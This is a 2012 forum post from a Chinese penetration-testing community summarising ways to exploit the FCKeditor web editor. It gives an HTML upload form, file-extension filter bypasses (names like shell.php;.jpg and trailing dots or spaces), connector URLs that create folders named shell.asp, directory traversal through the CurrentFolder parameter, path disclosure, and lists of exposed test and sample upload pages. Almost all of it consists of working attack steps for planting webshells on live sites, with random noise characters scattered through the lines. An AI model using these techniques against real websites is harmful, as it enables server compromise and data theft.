中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本
8 p3 \5 v* a$ Q( S. iFCKeditor/_whatsnew.html+ K1 Y: _0 {: r( {( G
—————————————————————————————————————————————————————————————

2. Version 2.2 版本) E3 a4 P* D/ r: N8 ~2 F
Apache+linux 环境下在上传文件后面加个.突破!测试通过。: H/ {9 T# X( B0 y
—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
4 w1 c8 A% E7 `$ w% O<form id="frmUpload" enctype="multipart/form-data"
5 v" y: c! c9 B- O$ gaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>% L( N( `7 ?% H" J
<input type="file" name="NewFile" size="50"><br>
# d# F+ @' w+ A3 Y<input id="btnUpload" type="submit" value="Upload">
" f% D, R$ J* X1 o' ]/ M" g</form>
- l  d* d3 ^. u—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
, n9 F2 P: @! `        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
+ ?$ _% A1 n. R$ i    4.1:提交shell.php+空格绕过
3 @+ a, n2 v' e2 f" ]" J不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
) `) E2 f8 Q, ]1 N1 d) z0 c    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。# v! i6 R/ y2 A+ y. y$ B! s
—————————————————————————————————————————————————————————————

5. 突破建立文件夹! {: h" \0 q, @6 ~  u6 ~3 O
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684# a0 v% N1 [. x1 }! p7 F
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp; `# c7 J/ c. [+ C3 s6 z
—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址! c7 k, Y7 y6 h3 d' W
FCKeditor/editor/filemanager/browser/default/connectors/test.html" I0 z8 T, r. d$ n/ r# U; w8 [5 ], I
FCKeditor/editor/filemanager/upload/test.html9 I* @1 R( k9 K3 e# U, A$ ~2 w
FCKeditor/editor/filemanager/connectors/test.html
3 u3 E7 w. B! k) z6 oFCKeditor/editor/filemanager/connectors/uploadtest.html- `( I7 \4 g; ?; C, o
—————————————————————————————————————————————————————————————
, x# E  O% N+ I

7.常用上传地址( y2 f8 e; r/ }+ Q: q
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/2 ^: m5 ~$ F/ f/ w; z+ z& r
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp( v5 ^' n1 o& l, D* o8 S: `
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
7 j- B9 o/ s% {9 k( ]' [" kJSP 版:& t0 T9 w. x" ^7 |$ w" G# x) ?
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp* A: y7 ~, c% u4 _4 b
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
  P/ H- g7 L$ z! a: @件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。, \, c( q7 i8 G6 P
—————————————————————————————————————————————————————————————

8.其他上传地址
1 X: B& Z+ _# pFCKeditor/_samples/default.html. p$ I. U% v0 u- v+ G0 z
FCKeditor/_samples/asp/sample01.asp
. _# X3 _) `: i) C; M: k& k9 kFCKeditor/_samples/asp/sample02.asp6 c% x! b' `7 [; y" C2 f& E; J
FCKeditor/_samples/asp/sample03.asp
, B4 q' ^0 x& m' I0 XFCKeditor/_samples/asp/sample04.asp+ D+ L. o. n  E- K, r- Q( B" w' B. O7 Y
一般很多站点都已删除_samples 目录,可以试试。9 }/ ?! s6 C9 g6 K
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
/ z' r( [0 W/ @—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址0 _+ Y* v2 y( Q; P& j
Version 2.4.1 测试通过
& J* U5 Z4 l$ X修改CurrentFolder 参数使用 ../../来进入不同的目录
- Y" O( G! b. W0 ]! o/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp' j+ ?4 \& E6 [0 x; [
根据返回的XML 信息可以查看网站所有的目录。* P. X/ T* h% m" n5 i: b
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F; O, [; s+ K' g2 O- |
也可以直接浏览盘符:' g6 P8 X7 E  ^/ h3 E
JSP 版本:
) Z/ F+ a: g) \8 ^9 qFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F2 s+ {4 t1 z) F& W  L9 E% A9 _' q2 b
—————————————————————————————————————————————————————————————

10.爆路径漏洞
6 a2 v  P: v# P5 BFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp/ K* E/ g0 }3 j6 E" Y
—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
- o- Y, B- p3 M& [1 S* o        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
0 o/ e* ?' |! D3 ~3 t% ^% I脆弱描述:) ]1 y0 z6 }1 i9 U3 Z" Q
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:, ~3 D+ t$ ?7 `
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm$ t- A( d1 V' A
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
+ [( a' m1 J6 L  X; y! B        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。2 B$ x5 w3 P3 H" _( L1 h
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2